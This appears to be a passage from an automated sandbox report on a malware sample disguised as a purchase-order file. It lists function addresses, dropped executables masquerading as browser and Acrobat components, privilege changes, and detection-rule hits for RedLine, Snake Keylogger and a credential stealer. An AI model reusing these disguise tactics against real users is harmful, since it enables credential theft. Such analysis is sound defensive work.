                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_004206D90_2_004206D9
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0046AACE0_2_0046AACE
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00434BEF0_2_00434BEF
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0042CCC10_2_0042CCC1
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0040AF500_2_0040AF50
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00406F070_2_00406F07
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0041B11F0_2_0041B11F
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_004631BC0_2_004631BC
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0042D1B90_2_0042D1B9
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0043724D0_2_0043724D
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0042123A0_2_0042123A
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_004413CA0_2_004413CA
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_004093F00_2_004093F0
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0041F5630_2_0041F563
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_004096C00_2_004096C0
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0044B6CC0_2_0044B6CC
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0046F7FF0_2_0046F7FF
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_004077B00_2_004077B0
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_004379C90_2_004379C9
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0041FA570_2_0041FA57
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00409B600_2_00409B60
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00413B700_2_00413B70
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00407D190_2_00407D19
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0041FE6F0_2_0041FE6F
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00429ED00_2_00429ED0
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00407FA30_2_00407FA3
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AF00D90_2_00AF00D9
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AB6EAF0_2_00AB6EAF
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AB51EE0_2_00AB51EE
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AED5800_2_00AED580
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AE37800_2_00AE3780
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AEC7F00_2_00AEC7F0
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AF39A30_2_00AF39A3
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AE59800_2_00AE5980
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AB7B710_2_00AB7B71
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AB7F800_2_00AB7F80
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00C100B00_2_00C100B0
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00C146180_2_00C14618
                        Source: C:\Windows\System32\AppVClient.exeCode function: 7_2_0075A8107_2_0075A810
                        Source: C:\Windows\System32\AppVClient.exeCode function: 7_2_00737C007_2_00737C00
                        Source: C:\Windows\System32\AppVClient.exeCode function: 7_2_00762D407_2_00762D40
                        Source: C:\Windows\System32\AppVClient.exeCode function: 7_2_007379F07_2_007379F0
                        Source: C:\Windows\System32\AppVClient.exeCode function: 7_2_0075EEB07_2_0075EEB0
                        Source: C:\Windows\System32\AppVClient.exeCode function: 7_2_007592A07_2_007592A0
                        Source: C:\Windows\System32\AppVClient.exeCode function: 7_2_007593B07_2_007593B0
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 8_2_00B4C6488_2_00B4C648
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 8_2_02BC39A38_2_02BC39A3
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 8_2_02B86EAF8_2_02B86EAF
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 8_2_02BB59808_2_02BB5980
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 8_2_02B851EE8_2_02B851EE
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 8_2_02B87F808_2_02B87F80
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 8_2_02BB37808_2_02BB3780
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 8_2_02BBC7F08_2_02BBC7F0
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 8_2_02BBD5808_2_02BBD580
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 10_2_009BA81010_2_009BA810
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 10_2_00997C0010_2_00997C00
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 10_2_009979F010_2_009979F0
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 10_2_009C2D4010_2_009C2D40
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 10_2_009BEEB010_2_009BEEB0
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 10_2_009B92A010_2_009B92A0
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 10_2_009B93B010_2_009B93B0
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 11_2_00A139A311_2_00A139A3
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 11_2_00A0598011_2_00A05980
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 11_2_009D6EAF11_2_009D6EAF
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 11_2_009D51EE11_2_009D51EE
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 11_2_00A0D58011_2_00A0D580
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 11_2_009D7F8011_2_009D7F80
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 11_2_00A0378011_2_00A03780
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 11_2_00A0C7F011_2_00A0C7F0
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 11_2_00D0E0AA11_2_00D0E0AA
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 11_2_00D0DED011_2_00D0DED0
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 12_2_00C07C0012_2_00C07C00
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 12_2_00C2A81012_2_00C2A810
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 12_2_00C079F012_2_00C079F0
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 12_2_00C32D4012_2_00C32D40
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 12_2_00C292A012_2_00C292A0
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 12_2_00C2EEB012_2_00C2EEB0
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 12_2_00C293B012_2_00C293B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00408C6013_2_00408C60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0040DC1113_2_0040DC11
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00407C3F13_2_00407C3F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00418CCC13_2_00418CCC
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00406CA013_2_00406CA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_004028B013_2_004028B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0041A4BE13_2_0041A4BE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0041824413_2_00418244
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0040165013_2_00401650
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00402F2013_2_00402F20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_004193C413_2_004193C4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0041878813_2_00418788
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00402F8913_2_00402F89
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_00402B9013_2_00402B90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_004073A013_2_004073A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_02830FE013_2_02830FE0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0283134713_2_02831347
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0283103013_2_02831030
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_014FC53015_2_014FC530
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_014F2DD115_2_014F2DD1
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_014F948015_2_014F9480
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_014F19B815_2_014F19B8
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_014FC52115_2_014FC521
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_014F946F15_2_014F946F
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF910815_2_05CF9108
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF60D815_2_05CF60D8
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF803015_2_05CF8030
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF739015_2_05CF7390
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF6D4815_2_05CF6D48
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF79E015_2_05CF79E0
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF15E815_2_05CF15E8
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF15F815_2_05CF15F8
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF358815_2_05CF3588
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF359815_2_05CF3598
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF048815_2_05CF0488
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF049815_2_05CF0498
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF242715_2_05CF2427
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF243815_2_05CF2438
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF46E915_2_05CF46E9
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF46F815_2_05CF46F8
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF866815_2_05CF8668
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF867815_2_05CF8678
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF51D815_2_05CF51D8
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF119015_2_05CF1190
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF11A015_2_05CF11A0
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF314015_2_05CF3140
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF313215_2_05CF3132
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF60C915_2_05CF60C9
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF004015_2_05CF0040
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF802415_2_05CF8024
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF003D15_2_05CF003D
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF738015_2_05CF7380
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF429015_2_05CF4290
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF42A015_2_05CF42A0
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF0D4815_2_05CF0D48
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF0D3915_2_05CF0D39
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF6D3715_2_05CF6D37
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF2CE815_2_05CF2CE8
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF2CE515_2_05CF2CE5
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF1E9A15_2_05CF1E9A
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF1EA815_2_05CF1EA8
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF3E4815_2_05CF3E48
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF3E4115_2_05CF3E41
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF79D015_2_05CF79D0
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF39E115_2_05CF39E1
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF39F015_2_05CF39F0
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF08E115_2_05CF08E1
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF08F015_2_05CF08F0
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF288015_2_05CF2880
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF289015_2_05CF2890
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF4B4015_2_05CF4B40
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF4B5015_2_05CF4B50
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF1A4015_2_05CF1A40
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeCode function: 15_2_05CF1A5015_2_05CF1A50
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_030CB49016_2_030CB490
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_030CB47016_2_030CB470
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 22_2_00B53AE822_2_00B53AE8
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 22_2_0304515C22_2_0304515C
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 22_2_0303598022_2_03035980
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 22_2_03006EAF22_2_03006EAF
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 22_2_030439A322_2_030439A3
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 22_2_030051EE22_2_030051EE
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 22_2_03007F8022_2_03007F80
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 22_2_0303378022_2_03033780
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 22_2_0303C7F022_2_0303C7F0
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeCode function: 22_2_0303D58022_2_0303D580
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Load DriverJump to behavior
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: SecurityJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0040E1D8 appears 44 times
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: String function: 0042F8A0 appears 35 times
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: String function: 00426AC0 appears 41 times
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: String function: 0041EC2F appears 68 times
                        Source: 117.0.5938.132_chrome_installer.exe.3.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.4
                        Source: 117.0.5938.132_chrome_installer.exe.3.drStatic PE information: Resource name: BL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 1522998 bytes, 1 file, at 0x2c +A "setup.exe", number 1, 133 datablocks, 0x1203 compression
                        Source: Acrobat.exe.3.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
                        Source: SingleClientServicesUpdater.exe.3.drStatic PE information: Resource name: 7Z type: 7-zip archive data, version 0.4
                        Source: identity_helper.exe.3.drStatic PE information: Number of sections : 12 > 10
                        Source: ie_to_edge_stub.exe.3.drStatic PE information: Number of sections : 11 > 10
                        Source: msedge_proxy.exe0.3.drStatic PE information: Number of sections : 12 > 10
                        Source: notification_click_helper.exe.3.drStatic PE information: Number of sections : 13 > 10
                        Source: pwahelper.exe0.3.drStatic PE information: Number of sections : 12 > 10
                        Source: msedge_proxy.exe.3.drStatic PE information: Number of sections : 12 > 10
                        Source: setup.exe.3.drStatic PE information: Number of sections : 13 > 10
                        Source: elevation_service.exe.3.drStatic PE information: Number of sections : 12 > 10
                        Source: msedgewebview2.exe.3.drStatic PE information: Number of sections : 14 > 10
                        Source: pwahelper.exe.3.drStatic PE information: Number of sections : 12 > 10
                        Source: msedge_pwa_launcher.exe.3.drStatic PE information: Number of sections : 13 > 10
                        Source: elevation_service.exe0.3.drStatic PE information: Number of sections : 12 > 10
                        Source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000003.2060455505.0000000003F20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameALG.exej% vs PO #09465610_GQ 003745_SO-242000846.exe
                        Source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000003.2053821168.0000000003EC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamearmsvc.exeN vs PO #09465610_GQ 003745_SO-242000846.exe
                        Source: unknownDriver loaded: C:\Windows\System32\drivers\AppVStrm.sys
                        Source: PO #09465610_GQ 003745_SO-242000846.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        Source: 11.2.Grinnellia.exe.48a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 13.2.RegSvcs.exe.3d24dc0.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                        Source: 13.2.RegSvcs.exe.3d24dc0.10.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 13.2.RegSvcs.exe.3d54e10.14.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                        Source: 13.2.RegSvcs.exe.3d54e10.14.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 8.2.Grinnellia.exe.48a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 22.2.Grinnellia.exe.4090000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 13.2.RegSvcs.exe.3d54e10.14.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                        Source: 13.2.RegSvcs.exe.3d54e10.14.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 15.0.server01.exe.e40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                        Source: 15.0.server01.exe.e40000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 13.2.RegSvcs.exe.3d3cdf0.12.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                        Source: 13.2.RegSvcs.exe.3d3cdf0.12.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 13.2.RegSvcs.exe.3d3cdf0.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                        Source: 13.2.RegSvcs.exe.3d3cdf0.12.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
